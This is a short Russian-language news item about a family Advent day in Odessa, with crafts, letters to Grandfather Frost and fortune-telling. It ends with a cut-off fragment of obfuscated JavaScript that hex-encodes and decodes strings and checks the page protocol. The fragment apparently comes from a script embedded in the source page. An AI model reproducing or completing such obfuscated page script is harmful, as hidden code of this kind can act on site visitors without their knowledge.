Одесские семьи почувствуют радость Нового года раньше остальных «фото»

Одесские семьи почувствуют радость Нового года раньше остальных

хендмейд

20 декабря с 11.00 до 19.00 в Одессе состоится семейный день в предвкушении зимних праздников. Приглашаются и взрослые, и дети. Каждому найдется занятие по душе. Сообщает корреспондент  Украинской Службы Информации.

Здесь можно будет собственными руками создать новогодние украшения, такие как Ангел Рождества, отправить письмо Деду Морозу, сфотографироваться на фоне сказочных декораций и даже составить планы на приближающийся год.

Организаторы мероприятия обещают, что в программу Семейного дня-предвкушения войдут также астрологический прогноз, имиджевые тренды нового года, кулинарные мастер-классы и дегустации новогоднего меню. Также можно будет ощутить всю силу предновогодних гаданий, поучаствовать в розыгрышах призов и подарков, посетить зону детского творчества.

По словам идейного вдохновителя Светланы Яровойорганизаторы назвали событие Адвент не слуйчано.

Слово Адвент происходит от латинского термина «adventus» и обозначает «пришествие, приход», так называют время ожидания, когда готовятся к празднику, – объясняет Яровая.

 

Как сообщала USI.online, в Одессе стартовал Фестиваль Рождества.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usi.online"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e